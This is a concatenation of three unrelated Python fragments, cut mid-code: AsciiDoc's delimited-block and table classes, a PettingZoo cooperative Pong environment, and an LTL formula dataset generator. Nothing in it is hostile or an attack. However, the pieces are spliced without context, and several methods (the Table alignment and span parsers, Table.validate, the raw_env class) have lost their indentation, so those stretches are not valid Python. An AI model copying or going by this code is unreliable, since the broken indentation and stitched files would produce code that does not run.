            mo = re.match(r'^listtags-(?P<name>\w+)$',section)
            if mo:
                name = mo.group('name')
                if name in self.tags:
                    # Later conf files update (not replace) earlier entries.
                    d = self.tags[name]
                else:
                    d = AttrDict()
                parse_entries(sections.get(section,()),d)
                for k in d.keys():
                    if k not in self.TAGS:
                        message.warning('[%s] contains illegal list tag: %s' %
                                (section,k))
                self.tags[name] = d
    def validate(self):
        AbstractBlocks.validate(self)
        for b in self.blocks:
            # Check list has valid type.
            if not b.type in Lists.TYPES:
                raise EAsciiDoc,'[%s] illegal type' % b.defname
            b.validate()
    def dump(self):
        # Dump list definitions followed by their tag sections.
        AbstractBlocks.dump(self)
        for k,v in self.tags.items():
            dump_section('listtags-'+k, v)
class DelimitedBlock(AbstractBlock):
    """An AsciiDoc delimited block: content bracketed by a pair of
    delimiter lines.  Depending on its options the body is skipped,
    treated as a nested section body, or read verbatim, filtered and
    substituted before being written between the block's tags."""
    def __init__(self):
        AbstractBlock.__init__(self)
    def load(self,name,entries):
        AbstractBlock.load(self,name,entries)
    def dump(self):
        # Dump the definition followed by a blank separator line.
        AbstractBlock.dump(self)
        write = lambda s: sys.stdout.write('%s%s' % (s,writer.newline))
        write('')
    def isnext(self):
        return AbstractBlock.isnext(self)
    def translate(self):
        """Consume the block from the global 'reader' and emit it through
        the global 'writer'.  Errors if EOF is hit before the closing
        delimiter."""
        AbstractBlock.translate(self)
        reader.read() # Discard delimiter.
        self.merge_attributes(AttributeList.attrs)
        if not 'skip' in self.parameters.options:
            BlockTitle.consume(self.attributes)
            AttributeList.consume()
        self.push_blockname()
        options = self.parameters.options
        if 'skip' in options:
            # Discard the body entirely.
            reader.read_until(self.delimiter,same_file=True)
        elif safe() and self.defname == 'blockdef-backend':
            # Backend passthrough blocks are suppressed in safe mode.
            message.unsafe('Backend Block')
            reader.read_until(self.delimiter,same_file=True)
        else:
            template = self.parameters.template
            template = subs_attrs(template,self.attributes)
            name = self.short_name()+' block'
            if 'sectionbody' in options:
                # The body is treated like a section body.
                stag,etag = config.section2tags(template,self.attributes)
                writer.write(stag,trace=name+' open')
                Section.translate_body(self)
                writer.write(etag,trace=name+' close')
            else:
                # Verbatim body: read it, apply pre-substitutions, the
                # optional filter command, then post-substitutions.
                stag = config.section2tags(template,self.attributes,skipend=True)[0]
                body = reader.read_until(self.delimiter,same_file=True)
                presubs = self.parameters.presubs
                postsubs = self.parameters.postsubs
                body = Lex.subs(body,presubs)
                if self.parameters.filter:
                    body = filter_lines(self.parameters.filter,body,self.attributes)
                body = Lex.subs(body,postsubs)
                # Write start tag, content, end tag.
                etag = config.section2tags(template,self.attributes,skipstart=True)[1]
                writer.write(dovetail_tags(stag,body,etag),trace=name)
                trace(self.short_name()+' block close',etag)
        if reader.eof():
            self.error('missing closing delimiter',self.start)
        else:
            delimiter = reader.read() # Discard delimiter line.
            assert re.match(self.delimiter,delimiter)
        self.pop_blockname()
class DelimitedBlocks(AbstractBlocks):
    """Collection of DelimitedBlock definitions loaded from blockdef-* sections."""
    BLOCK_TYPE = DelimitedBlock
    PREFIX = 'blockdef-'

    def __init__(self):
        AbstractBlocks.__init__(self)

    def load(self, sections):
        """Update blocks defined in 'sections' dictionary."""
        AbstractBlocks.load(self, sections)

    def validate(self):
        """Validation is handled entirely by the generic block machinery."""
        AbstractBlocks.validate(self)
class Column:
    """A single table column: parsed spec values plus calculated widths."""
    def __init__(self, width=None, align_spec=None, style=None):
        # A missing/empty width defaults to the proportional width '1'.
        if width:
            self.width = width
        else:
            self.width = '1'
        halign, valign = Table.parse_align_spec(align_spec)
        self.halign = halign
        self.valign = valign
        self.style = style  # Style name or None.
        # Filled in later once the table geometry is known.
        self.abswidth = None  # 1.. (page units).
        self.pcwidth = None   # 1..99 (percentage).
class Cell:
    """A single table cell: data plus span, alignment and style specifiers."""
    def __init__(self, data, span_spec=None, align_spec=None, style=None):
        self.data = data
        spans = Table.parse_span_spec(span_spec)
        self.span, self.vspan = spans
        aligns = Table.parse_align_spec(align_spec)
        self.halign, self.valign = aligns
        self.style = style
        # True when this cell is a placeholder reserved by a vertical span.
        self.reserved = False

    def __repr__(self):
        return '<Cell: %d.%d %s.%s %s "%s">' % (
            self.span, self.vspan,
            self.halign, self.valign,
            self.style or '',
            self.data)

    def clone_reserve(self):
        """Return a clone of self to reserve vertically spanned cell."""
        clone = copy.copy(self)
        clone.vspan = 1
        clone.reserved = True
        return clone
class Table(AbstractBlock):
    # Maps alignment spec characters to horizontal/vertical alignment names.
    ALIGN = {'<':'left', '>':'right', '^':'center'}
    VALIGN = {'<':'top', '>':'bottom', '^':'middle'}
    # Supported table data formats.
    FORMATS = ('psv','csv','dsv')
    # Cell separator regexps keyed by data format.
    SEPARATORS = dict(
        csv=',',
        dsv=r':|\n',
        # The count and align group matches are not exact.
        psv=r'((?<!\S)((?P<span>[\d.]+)(?P<op>[*+]))?(?P<align>[<\^>.]{,3})?(?P<style>[a-z])?)?\|'
    )
    def __init__(self):
        AbstractBlock.__init__(self)
        self.CONF_ENTRIES += ('format','tags','separator')
        # tabledef conf file parameters.
        self.format = 'psv'
        self.separator = None
        self.tags = None      # Name of tabletags-<tags> conf section.
        # Calculated parameters.
        self.abswidth = None  # 1.. (page units).
        self.pcwidth = None   # 1..99 (percentage).
        self.rows = []        # Parsed rows, each row is a list of Cells.
        self.columns = []     # List of Columns.
@staticmethod
def parse_align_spec(align_spec):
"""
Parse AsciiDoc cell alignment specifier and return 2-tuple with
horizonatal and vertical alignment names. Unspecified alignments
set to None.
"""
result = (None, None)
if align_spec:
mo = re.match(r'^([<\^>])?(\.([<\^>]))?$', align_spec)
if mo:
result = (Table.ALIGN.get(mo.group(1)),
Table.VALIGN.get(mo.group(3)))
return result
@staticmethod
def parse_span_spec(span_spec):
"""
Parse AsciiDoc cell span specifier and return 2-tuple with horizonatal
and vertical span counts. Set default values (1,1) if not
specified.
"""
result = (None, None)
if span_spec:
mo = re.match(r'^(\d+)?(\.(\d+))?$', span_spec)
if mo:
result = (mo.group(1) and int(mo.group(1)),
mo.group(3) and int(mo.group(3)))
return (result[0] or 1, result[1] or 1)
    def load(self, name, entries):
        # Table definitions add no parsing beyond the generic block loader.
        AbstractBlock.load(self, name, entries)
    def dump(self):
        # Dump base block entries plus the table-specific format entry.
        AbstractBlock.dump(self)
        write = lambda s: sys.stdout.write('%s%s' % (s, writer.newline))
        write('format=' + self.format)
        write('')
def validate(self):
AbstractBlock.validate(self)
if self.format not in Table.FORMATS:
self.error('illegal format=%s' % self.format,halt=True)
self.tags = self.tags or 'default'
tags = [self.tags]
tags += [s['tags'] for s in self.styles.values() if 'tags' in s]
for t in tags:
| |
import os
import numpy as np
import gym
from gym.utils import seeding
from .cake_paddle import CakePaddle, RENDER_RATIO
from .manual_control import manual_control
from pettingzoo import AECEnv
from pettingzoo.utils import wrappers
from pettingzoo.utils.agent_selector import agent_selector
from pettingzoo.utils.to_parallel import parallel_wrapper_fn
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = 'hide'
import pygame
from gym.utils import EzPickle
KERNEL_WINDOW_LENGTH = 1
def get_image(path):
    """Load and return the pygame image stored at ``path``."""
    return pygame.image.load(path)
def deg_to_rad(deg):
    """Convert an angle given in degrees to radians."""
    scaled = deg * np.pi
    return scaled / 180
def get_flat_shape(width, height):
    """Flattened length of one agent's (half-width) observation after kernel downsampling."""
    denominator = 2 * KERNEL_WINDOW_LENGTH * KERNEL_WINDOW_LENGTH
    return int(width * height / denominator)
def original_obs_shape(screen_width, screen_height):
    """(H, W, 1) shape of one agent's grayscale observation: half the screen width."""
    obs_height = int(screen_height / KERNEL_WINDOW_LENGTH)
    obs_width = int(screen_width / (2 * KERNEL_WINDOW_LENGTH))
    return (obs_height, obs_width, 1)
def get_valid_angle(randomizer):
    """
    Draw an angle in [0, 2*pi) avoiding near-vertical and near-horizontal
    directions, so the ball always makes progress toward a paddle.
    Excluded bands (degrees): (90 +- 25), (270 +- 25), (180 +- 10) and
    +-10 around 0/360 -- i.e. (65, 115), (245, 295), (170, 190), (0, 10), (350, 360).
    """
    ver_deg_range = 25
    hor_deg_range = 10
    # Exclusion band edges, in radians.
    a1 = deg_to_rad(90 - ver_deg_range)
    b1 = deg_to_rad(90 + ver_deg_range)
    a2 = deg_to_rad(270 - ver_deg_range)
    b2 = deg_to_rad(270 + ver_deg_range)
    c1 = deg_to_rad(180 - hor_deg_range)
    d1 = deg_to_rad(180 + hor_deg_range)
    c2 = deg_to_rad(360 - hor_deg_range)
    d2 = deg_to_rad(0 + hor_deg_range)

    def excluded(theta):
        return (a1 < theta < b1) or (a2 < theta < b2) or \
               (c1 < theta < d1) or theta > c2 or theta < d2

    angle = 0  # 0 lies in an excluded band, so at least one draw happens.
    while excluded(angle):
        angle = 2 * np.pi * randomizer.rand()
    return angle
def get_small_random_value(randomizer):
    """Draw a small random bounce perturbation in the interval [0, 1/100)."""
    scale = 1 / 100
    return scale * randomizer.rand()
class PaddleSprite(pygame.sprite.Sprite):
    """Rectangular paddle that moves vertically and reflects the ball on contact."""
    def __init__(self, dims, speed):
        # NOTE(review): pygame.sprite.Sprite.__init__ is never called; this is
        # only safe while paddles are not added to sprite Groups -- confirm.
        self.surf = pygame.Surface(dims)
        self.rect = self.surf.get_rect()
        self.speed = speed
    def reset(self):
        # Plain paddles keep no per-episode state; CakePaddle overrides this.
        pass
    def draw(self, screen):
        pygame.draw.rect(screen, (255, 255, 255), self.rect)
    def update(self, area, action):
        # action: 1 - up, 2 - down
        movepos = [0, 0]
        if action > 0:
            if action == 1:
                movepos[1] = movepos[1] - self.speed
            elif action == 2:
                movepos[1] = movepos[1] + self.speed
        # make sure the players stay inside the screen
        newpos = self.rect.move(movepos)
        if area.contains(newpos):
            self.rect = newpos
    def process_collision(self, b_rect, dx, dy, b_speed, paddle_type):
        '''
        Resolve a ball/paddle collision along a single axis.
        Parameters
        ----------
        b_rect : Ball rect
        dx, dy : Ball speed along single axis
        b_speed : Ball speed
        paddle_type : 1 for the left paddle, 2 for the right paddle
        Returns
        -------
        is_collision: 1 if ball collides with paddle
        b_rect: new ball rect
        b_speed: new ball speed
        '''
        if paddle_type == 1:
            if self.rect.colliderect(b_rect):
                is_collision = True
                # Ball moving left hits the left paddle's right face.
                if dx < 0:
                    b_rect.left = self.rect.right
                    b_speed[0] = -b_speed[0]
                # top or bottom edge
                elif dy > 0:
                    b_rect.bottom = self.rect.top
                    b_speed[1] = -b_speed[1]
                elif dy < 0:
                    b_rect.top = self.rect.bottom
                    b_speed[1] = -b_speed[1]
                return is_collision, b_rect, b_speed
        elif paddle_type == 2:
            if self.rect.colliderect(b_rect):
                is_collision = True
                # Ball moving right hits the right paddle's left face.
                if dx > 0:
                    b_rect.right = self.rect.left
                    b_speed[0] = -b_speed[0]
                # top or bottom edge
                elif dy > 0:
                    b_rect.bottom = self.rect.top
                    b_speed[1] = -b_speed[1]
                elif dy < 0:
                    b_rect.top = self.rect.bottom
                    b_speed[1] = -b_speed[1]
                return is_collision, b_rect, b_speed
        return False, b_rect, b_speed
class BallSprite(pygame.sprite.Sprite):
    """
    The ball.  Moves one axis at a time so collisions resolve per axis; its
    update methods return True ("done") when the ball exits through the left
    or right edge of the play area.
    """
    def __init__(self, randomizer, dims, speed, bounce_randomness=False):
        self.surf = pygame.Surface(dims)
        self.rect = self.surf.get_rect()
        self.speed_val = speed
        # Initial direction is 45 degrees; the environment's reset() replaces
        # this with a freshly drawn random angle.
        self.speed = [int(self.speed_val * np.cos(np.pi / 4)), int(self.speed_val * np.sin(np.pi / 4))]
        self.bounce_randomness = bounce_randomness
        self.done = False
        self.hit = False
        self.randomizer = randomizer

    def update2(self, area, p0, p1):
        """Advance the ball one step; return True when it left the field."""
        # (Removed an unused unpacking of self.speed into local names.)
        done_x, done_y = False, False
        if self.speed[0] != 0:
            done_x = self.move_single_axis(self.speed[0], 0, area, p0, p1)
        if self.speed[1] != 0:
            done_y = self.move_single_axis(0, self.speed[1], area, p0, p1)
        return (done_x or done_y)

    def move_single_axis(self, dx, dy, area, p0, p1):
        """Move by (dx, dy), bounce off walls/paddles; return True when out of bounds."""
        # move ball rect
        self.rect.x += dx
        self.rect.y += dy
        if not area.contains(self.rect):
            # bottom wall
            if dy > 0:
                self.rect.bottom = area.bottom
                self.speed[1] = -self.speed[1]
            # top wall
            elif dy < 0:
                self.rect.top = area.top
                self.speed[1] = -self.speed[1]
            # right or left walls: the ball left the field, episode ends.
            # Fix: a dead `self.speed[0] = -self.speed[0]` that sat after this
            # return (unreachable leftover from side-wall bouncing) was removed.
            else:
                return True
        else:
            # Do ball and bat collide?
            # add some randomness
            r_val = 0
            if self.bounce_randomness:
                r_val = get_small_random_value(self.randomizer)
            # ball in left half of screen
            if self.rect.center[0] < area.center[0]:
                is_collision, self.rect, self.speed = p0.process_collision(self.rect, dx, dy, self.speed, 1)
                if is_collision:
                    self.speed = [self.speed[0] + np.sign(self.speed[0]) * r_val, self.speed[1] + np.sign(self.speed[1]) * r_val]
            # ball in right half
            else:
                is_collision, self.rect, self.speed = p1.process_collision(self.rect, dx, dy, self.speed, 2)
                if is_collision:
                    self.speed = [self.speed[0] + np.sign(self.speed[0]) * r_val, self.speed[1] + np.sign(self.speed[1]) * r_val]
        return False

    def draw(self, screen):
        pygame.draw.rect(screen, (255, 255, 255), self.rect)
class CooperativePong(gym.Env):
    """
    Two-paddle cooperative pong.  Both agents receive a shared per-frame
    reward while the ball stays in play and a shared -100 when it leaves
    through a side wall; each agent observes its own half of the screen.
    """
    metadata = {'render.modes': ['human', "rgb_array"]}
    def __init__(self, randomizer, ball_speed=9, left_paddle_speed=12, right_paddle_speed=12, cake_paddle=True, max_cycles=900, bounce_randomness=False):
        super(CooperativePong, self).__init__()
        pygame.init()
        self.num_agents = 2
        # Display screen
        self.s_width, self.s_height = 960 // RENDER_RATIO, 560 // RENDER_RATIO
        self.screen = pygame.Surface((self.s_width, self.s_height))  # (960, 720) # (640, 480) # (100, 200)
        self.area = self.screen.get_rect()
        # define action and observation spaces
        self.action_space = [gym.spaces.Discrete(3) for _ in range(self.num_agents)]
        original_shape = original_obs_shape(self.s_width, self.s_height)
        original_color_shape = (original_shape[0], original_shape[1], 3)
        # self.observation_space = [gym.spaces.Box(low=0.0, high=1.0, shape=(original_shape), dtype=np.float32) for _ in range(self.num_agents)]
        self.observation_space = [gym.spaces.Box(low=0, high=255, shape=(original_color_shape), dtype=np.uint8) for _ in range(self.num_agents)]
        self.renderOn = False
        # set speed
        self.speed = [ball_speed, left_paddle_speed, right_paddle_speed]
        self.max_cycles = max_cycles
        # paddles
        self.p0 = PaddleSprite((20 // RENDER_RATIO, 80 // RENDER_RATIO), left_paddle_speed)
        if cake_paddle:
            self.p1 = CakePaddle(right_paddle_speed)
        else:
            self.p1 = PaddleSprite((20 // RENDER_RATIO, 100 // RENDER_RATIO), right_paddle_speed)
        self.agents = ["paddle_0", "paddle_1"]  # list(range(self.num_agents))
        # ball
        self.ball = BallSprite(randomizer, (20 // RENDER_RATIO, 20 // RENDER_RATIO), ball_speed, bounce_randomness)
        self.randomizer = randomizer
        self.reinit()
    def reinit(self):
        # Reset per-episode bookkeeping dicts and the cumulative score.
        self.rewards = dict(zip(self.agents, [0.0] * len(self.agents)))
        self.dones = dict(zip(self.agents, [False] * len(self.agents)))
        self.infos = dict(zip(self.agents, [{}] * len(self.agents)))
        self.score = 0
    def reset(self):
        # does not return observations
        # reset ball and paddle init conditions
        self.ball.rect.center = self.area.center
        # set the direction to an angle between [0, 2*np.pi)
        angle = get_valid_angle(self.randomizer)
        # angle = deg_to_rad(89)
        self.ball.speed = [int(self.ball.speed_val * np.cos(angle)), int(self.ball.speed_val * np.sin(angle))]
        self.p0.rect.midleft = self.area.midleft
        self.p1.rect.midright = self.area.midright
        self.p0.reset()
        self.p1.reset()
        self.p0.speed = self.speed[1]
        self.p1.speed = self.speed[2]
        self.done = False
        self.num_frames = 0
        self.reinit()
        self.draw()
    def close(self):
        if self.renderOn:
            pygame.event.pump()
            pygame.display.quit()
            self.renderOn = False
    def enable_render(self):
        # Replace the off-screen surface with a real display window.
        self.screen = pygame.display.set_mode(self.screen.get_size())
        self.renderOn = True
        self.draw()
    def render(self, mode='human'):
        if not self.renderOn and mode == "human":
            # sets self.renderOn to true and initializes display
            self.enable_render()
        observation = pygame.surfarray.pixels3d(self.screen)
        pygame.display.flip()
        return np.transpose(observation, axes=(1, 0, 2)) if mode == "rgb_array" else None
    def observe(self, agent):
        observation = pygame.surfarray.pixels3d(self.screen)
        observation = np.rot90(observation, k=3)  # now the obs is laid out as H, W as rows and cols
        observation = np.fliplr(observation)  # laid out in the correct order
        # Each agent sees only its own half of the screen.
        if agent == self.agents[0]:
            return observation[:, :int(observation.shape[1] / 2), :]
        elif agent == self.agents[1]:
            return observation[:, int(observation.shape[1] / 2):, :]
    def draw(self):
        # draw background
        # pygame.display.get_surface().fill((0, 0, 0))
        pygame.draw.rect(self.screen, (0, 0, 0), self.area)
        # draw ball and paddles
        self.p0.draw(self.screen)
        self.p1.draw(self.screen)
        self.ball.draw(self.screen)
    def step(self, action, agent):
        '''
        Does not return anything
        '''
        # update p0, p1 accordingly
        # action: 0: do nothing,
        # action: 1: p[i] move up, 2: p[i] move down
        if agent == self.agents[0]:
            self.rewards = {a: 0 for a in self.agents}
            self.p0.update(self.area, action)
        elif agent == self.agents[1]:
            self.p1.update(self.area, action)
            # do the rest if not done
            if not self.done:
                # update ball position
                self.done = self.ball.update2(self.area, self.p0, self.p1)
                # do the miscellaneous stuff after the last agent has moved
                # reward is the length of time ball is in play
                reward = 0
                # ball is out-of-bounds
                if self.done:
                    reward = -100
                    self.score += reward
                if not self.done:
                    self.num_frames += 1
                    # scaling reward so that the max reward is 100
                    reward = 100 / self.max_cycles
                    self.score += reward
                    if self.num_frames == self.max_cycles:
                        self.done = True
                # The shared reward is split evenly between the two agents.
                for ag in self.agents:
                    self.rewards[ag] = reward / self.num_agents
                    self.dones[ag] = self.done
                    self.infos[ag] = {}
        if self.renderOn:
            pygame.event.pump()
        self.draw()
def env(**kwargs):
    """Build the AEC environment wrapped in the standard PettingZoo wrappers."""
    wrapped = raw_env(**kwargs)
    # Order matters: bounds/NaN guards first, order enforcement outermost.
    wrapped = wrappers.AssertOutOfBoundsWrapper(wrapped)
    wrapped = wrappers.NanNoOpWrapper(wrapped, 0, "doing nothing")
    return wrappers.OrderEnforcingWrapper(wrapped)
# Parallel-API counterpart of env(), built via the PettingZoo wrapper factory.
parallel_env = parallel_wrapper_fn(env)
class raw_env(AECEnv, EzPickle):
# class env(MultiAgentEnv):
metadata = {'render.modes': ['human', "rgb_array"]}
def __init__(self, **kwargs):
EzPickle.__init__(self, **kwargs)
self._kwargs = kwargs
self.seed()
self.agents = self.env.agents[:]
self.possible_agents = self.agents[:]
self._agent_selector = agent_selector(self.agents)
self.agent_selection = self._agent_selector.reset()
# spaces
self.action_spaces = dict(zip(self.agents, self.env.action_space))
self.observation_spaces = dict(zip(self.agents, self.env.observation_space))
# dicts
self.observations = {}
self.rewards = self.env.rewards
self.dones = self.env.dones
| |
<filename>impl/dlsgs/data_generation/generator.py
#!python3.7
# implementation based on DeepLTL https://github.com/reactive-systems/deepltl
# pylint: disable=line-too-long
from __future__ import generator_stop # just to be safe with python 3.7
import sys, os, re
import signal
import datetime
import argparse
import random
import json
from tensorflow.io import gfile # pylint: disable=import-error
from dlsgs.utils import ltl_parser, utils
from dlsgs.data_generation.ltl import solve_ltl
from dlsgs.data_generation.prop import solve_prop
class DistributionGate():
    """
    Admission gate that shapes the distribution of generated formulas over a
    histogram key (currently only 'formula size').

    interval is inclusive: [a, b].  With distribution='uniform' each bin gets
    an equal share of total_num as a target (scaled by 1 - alpha); with
    'arbitrary' anything inside the interval is accepted.
    """
    def __init__(self, key, distribution, interval, total_num, **kwargs):
        # Optional kwargs: start_calc_from (first bin whose target is
        # enforced by full()) together with alpha (fraction of total_num
        # exempted from the per-bin targets).
        self.dist = {}     # bin -> number of accepted items
        self.targets = {}  # bin -> max number of items (uniform only)
        self.fulls = {}    # bin -> target reached?
        self.key = key
        self.interval = interval
        self.alpha = kwargs.get('alpha', 0.0)  # idiom: replaces manual 'in kwargs' check
        self.distribution = distribution
        bleft, bright = interval
        if key == 'formula size':
            self.bins = list(range(bleft, bright + 1))
            self.get_val = lambda x: x.size()
        else:
            raise ValueError()
        for b in self.bins:
            self.dist[b] = 0
        if distribution == 'uniform':
            if 'start_calc_from' in kwargs:
                start = kwargs['start_calc_from']
                self.enforced_bins = [b for b in self.bins if b >= start]
            else:
                self.enforced_bins = self.bins
            num_actual_bins = len(self.enforced_bins)
            for b in self.bins:
                self.targets[b] = total_num * \
                    (1 - self.alpha) / num_actual_bins
                self.fulls[b] = self.dist[b] >= self.targets[b]
        elif distribution == 'arbitrary':
            pass
        else:
            raise ValueError()

    def gate(self, formula_obj: 'ltl_parser.LTLFormula') -> bool:
        """Return True iff formula_obj may be accepted without violating the distribution."""
        val = self.get_val(formula_obj)
        if val < self.interval[0] or val > self.interval[1]:  # not in range
            return False
        if self.distribution == 'arbitrary':
            return True
        return not self.fulls[val]

    def update(self, formula_obj: 'ltl_parser.LTLFormula'):
        """Record an accepted formula; mark its bin full once the target is reached."""
        val = self.get_val(formula_obj)
        if self.interval[0] <= val <= self.interval[1]:
            self.dist[val] += 1
            if self.distribution != 'arbitrary' and self.dist[val] >= self.targets[val]:
                self.fulls[val] = True

    def histogram(self, show=True, save_to=None):
        """Plot the current bin counts; optionally save the figure to save_to."""
        import matplotlib.pyplot as plt
        figure, axis = plt.subplots(1)
        counts = [val for key, val in sorted(self.dist.items())]
        axis.bar(self.bins, counts, width=1,
                 color='#3071ff', edgecolor='white')
        axis.set_ylabel('number of items')
        axis.set_xlabel(self.key)
        axis.title.set_text('alpha = ' + str(self.alpha))
        if save_to is not None:
            figure.savefig(save_to)
        if show:
            plt.show()
        else:
            plt.close(figure)

    def full(self) -> bool:
        """True when every enforced bin reached its target (never for 'arbitrary')."""
        if self.distribution == 'arbitrary':
            return False
        return all(self.fulls[eb] for eb in self.enforced_bins)
def generate_examples(params, pers_worker):
    """
    Generate (formula, witness, stats) examples until params.num_examples is
    reached, the size distribution is full, the runtime budget is exceeded,
    or SIGINT is received.  Returns (examples, timeout_formulas, info).
    """
    interrupted = False
    def signal_handler(signal, frame):
        nonlocal interrupted
        print(f"Received signal {signal:d}, interrupting generation")
        interrupted = True
    signal.signal(signal.SIGINT, signal_handler)
    # Build the atomic-proposition vocabulary.
    if params.token_format['variables'] == 'alphabetical':
        if params.num_variables > 26:
            raise ValueError("Cannot generate more than 26 APs")
        variables = list(map(chr, range(97, 97 + params.num_variables)))
    elif params.token_format['variables'] == 'p_numeric':
        variables = list(f'p{q:d}' for q in range(params.num_variables))
    if not isinstance(params.tree_size, tuple):
        params.tree_size = (1, params.tree_size)
    # Choose the formula source: spot's random generator or pattern generators.
    if params.formula_generator == 'spot':
        import spot
        token_dist = re.sub(r'ap=[!]', 'ap={}'.format(len(variables)), params.token_dist)
        if params.problem == 'ltl':
            formula_generator = spot.randltl(variables, seed=params.seed, tree_size=params.tree_size, output='ltl', ltl_priorities=token_dist, simplify=0)
        elif params.problem == 'prop':
            formula_generator = spot.randltl(variables, seed=params.seed, tree_size=params.tree_size, output='bool', boolean_priorities=token_dist, simplify=0)
        else:
            raise ValueError()
    elif params.formula_generator == 'spec_patterns':
        assert params.problem == 'ltl'
        from dlsgs.data_generation.spec_patterns import SpecPatternGen
        class SpecPatternGenWrapper:
            # Adapts SpecPatternGen to the iterator protocol used below.
            def __next__(self):
                d = SpecPatternGen(variables, params.tree_size)
                return d.run()
        formula_generator = SpecPatternGenWrapper()
    elif params.formula_generator == 'dac_patterns':
        assert params.problem == 'ltl'
        assert params.token_format['variables'] == 'alphabetical'
        from dlsgs.data_generation.general_patterns import GeneralPatternGenerator
        formula_generator = GeneralPatternGenerator('dac', variables, params.tree_size)
    else:
        raise ValueError()
    tictoc = utils.TicToc()
    dist_gate = DistributionGate('formula size', params.formula_dist, params.tree_size, params.num_examples, start_calc_from=10, alpha=params.alpha)
    # generate samples
    print('Generating examples...')
    examples = []
    timeout_formulas = []
    sat_examples = 0
    unsat_examples = 0
    total_examples = 0
    dropped_sat_examples = 0
    dropped_unsat_examples = 0
    dropped_dist_examples = 0
    dropped_timeout_examples = 0
    time_started = datetime.datetime.now()
    last_msg_time = time_started
    last_msg_percent = 0
    # Accumulators for averaged statistics reported at the end.
    accu = { k : 0 for k in {'model_count', 'model_poss', 'model_frac', 'log_model_count', 'log_model_poss', 'log_model_frac', 'in_length', 'out_length', 'solve_time'}}
    if params.include_solver_statistics and params.problem == 'ltl' and params.ltl_solver == 'leviathan':
        accu.update({k : 0 for k in ['lev_evtls', 'lev_frames', 'lev_steps', 'lev_max_model_size', 'lev_max_depth']})
    info = {'max_in_length' : 0, 'max_out_length' : 0}
    while True:
        # Periodic progress message (every log_each_x_percent or at least hourly).
        current_percent = total_examples / params.num_examples * 100
        now = datetime.datetime.now()
        if current_percent - last_msg_percent >= params.log_each_x_percent or now - last_msg_time > datetime.timedelta(hours=1):
            last_msg_percent = current_percent
            last_msg_time = now
            print("Generated {:,d} of {:,d} examples ({:4.1f}%); dropped {:,d} sat, {:,d} unsat, {:,d} dist, {:,d} timeout; at {:s} runtime".format(total_examples,
                params.num_examples, current_percent, dropped_sat_examples, dropped_unsat_examples, dropped_dist_examples, dropped_timeout_examples, utils.strfdelta_hms(now - time_started)))
            sys.stdout.flush()
        # Termination conditions.
        if total_examples >= params.num_examples:
            #print(f'Terminated: Generated specified amount of examples ({total_examples}).')
            break
        if dist_gate.full():
            #print(f'Terminated: Distribution is full.')
            break
        if interrupted:
            #print(f'Terminated: Interrupted.')
            break
        if params.max_runtime != 0.0 and (now - time_started).total_seconds() > params.max_runtime:
            print('Exiting due to exceeded runtime')
            break
        tictoc.tic()
        formula = next(formula_generator)
        # Normalize the generator output to an LTLFormula object.
        if not isinstance(formula, ltl_parser.LTLFormula):
            if not isinstance(formula, str):
                if formula is None:
                    continue  # only case: dac_patterns max_size too small
                formula = formula.to_str()
            formula_obj = ltl_parser.ltl_formula(formula, 'spot')
        else:
            formula_obj = formula
        tictoc.toc('formula generation')
        if not dist_gate.gate(formula_obj):  # formula doesn't fit distribution
            dropped_dist_examples += 1
            continue
        if formula == '1':  # special case, currently not handled by all solvers (leviathan)
            continue
        tictoc.tic()
        if params.problem == 'ltl':
            is_sat, witness, d = solve_ltl(formula_obj, params.ltl_solver, pers_worker, timeout=params.timeout, simplify=False, no_disjunctions=True, witness='witness' in params.subproblem, binary_path=params.binary_dir)
        elif params.problem == 'prop':
            is_sat, witness, d = solve_prop(formula_obj, params.prop_solver, params.solution_choice, simplify=True, count_models=params.include_log_model_count, model_counting=params.model_counting, binary_path=params.binary_dir)
        tictoc.toc('solving')
        if is_sat is None:  # due to timeout
            # print('Trace generation timed out ({:d}s) for formula {}'.format(int(timeout), formula_obj.to_str('spot')))
            if params.require_solved:
                if params.save_timeouts:
                    timeout_formulas.append(formula_obj.to_str('spot', spacing='all ops', full_parens=True))
                dropped_timeout_examples += 1
                continue
            else:  # no solved required
                # TODO how to count? for now, just do not increment specifc counter (only total at end)
                witness_str = ''
                dist_gate.update(formula_obj)
        elif not is_sat and params.require_sat:
            dropped_unsat_examples += 1
            continue
        elif not is_sat and not params.require_sat:  # unsat
            if (params.frac_unsat is not None) and unsat_examples >= params.frac_unsat * params.num_examples:
                dropped_unsat_examples += 1
                continue
            else:  # more unsat samples needed
                witness_str = '0'
                dist_gate.update(formula_obj)
                unsat_examples += 1
        else:  # is_sat
            if not params.require_sat and (params.frac_unsat is not None) and sat_examples >= (1 - params.frac_unsat) * params.num_examples:
                dropped_sat_examples += 1
                continue
            elif random.random() < params.drop_sat_prob:
                # don't log
                continue
            else:  # more sat samples needed
                if params.problem == 'ltl':
                    if 'witness' in params.subproblem:
                        witness_str = witness.to_str('network-' + params.operator_notation)
                    else:
                        witness_str = '1'
                    out_length = len(witness_str)
                elif params.problem == 'prop':
                    assert not params.solution_choice == 'all'
                    # todo: format in case of trivial?
                    if True in witness:
                        witness_str = '1'
                    else:
                        witness_str = ''.join([var.name + str(int(val)) for (var, val) in sorted(witness.items(), key=lambda x:x[0].name)])
                    out_length = len(witness_str)
                info['max_out_length'] = max(info['max_out_length'], out_length)
                accu['out_length'] += out_length
                dist_gate.update(formula_obj)
                sat_examples += 1
        # Fold solver statistics of the accepted example into the accumulators.
        for k, v in d.items():
            if k in accu:
                accu[k] += v
        in_length = formula_obj.size()
        info['max_in_length'] = max(info['max_in_length'], in_length)
        accu['in_length'] += in_length
        formula_str = formula_obj.to_str('network-' + params.operator_notation)
        examples.append((formula_str, witness_str, d))
        total_examples += 1
    # Final statistics.
    # NOTE(review): the averages below divide by sat_examples/total_examples
    # and raise ZeroDivisionError when nothing was generated -- confirm callers
    # never request statistics on an empty run.
    if params.problem == 'prop' and params.include_log_model_count:
        print('sat ex', sat_examples)
        info['avg_model_count'] = accu['model_count'] / sat_examples
        info['avg_model_poss'] = accu['model_poss'] / sat_examples
        info['avg_model_percent'] = accu['model_count'] / accu['model_poss'] * 100
        info['avg_model_pre_percent'] = accu['model_frac'] / sat_examples * 100
        print('Average model count: {avg_model_count:.1f} / {avg_model_poss:.1f} (post {avg_model_percent:.1f}%, pre {avg_model_pre_percent:.1f}%)'.format(**info))
        info['avg_log_model_count'] = accu['log_model_count'] / sat_examples
        info['avg_log_model_poss'] = accu['log_model_poss'] / sat_examples
        info['avg_log_model_percent'] = accu['log_model_count'] / accu['log_model_poss'] * 100
